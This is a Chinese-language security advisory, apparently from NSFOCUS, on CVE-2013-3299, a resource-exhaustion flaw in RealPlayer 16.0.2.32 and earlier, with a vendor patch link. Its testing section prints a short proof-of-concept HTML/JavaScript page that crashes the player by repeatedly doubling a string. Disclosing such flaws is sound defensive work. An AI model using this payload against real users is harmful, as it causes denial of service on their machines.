安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Real Player资源耗尽漏洞
发布日期:
2013-04-23
更新日期:
2013-07-03
受影响系统:
Real Networks RealPlayer <= 16.0.2.32
描述:
CVE(CAN) ID:
CVE-2013-3299
RealPlayer是网上收听收看实时音频、视频和Flash的工具。
Real Player <= 16.0.2.32在实现上存在资源耗尽漏洞,在处理特制的HTML文件时,Real Player使用了该文件中的值控制循环操作,在使用该值之前未能正确验证,导致拒绝服务。
<*来源:Akshaysinh Vaghela
链接:
http://www.securityfocus.com/archive/1/527039
http://seclists.org/bugtraq/2013/Jul/18
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://i40.tinypic.com/2mg1gt3.jpg
http://i39.tinypic.com/5phchx.png
POC Exploit code:
<html>
<head>
<script language="JavaScript">
{
var buffer = '\x41'
for(i=0; i <= 100 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</html>
建议:
厂商补丁:
Real Networks
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://service.real.com/realplayer/security/
浏览次数:
3645
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客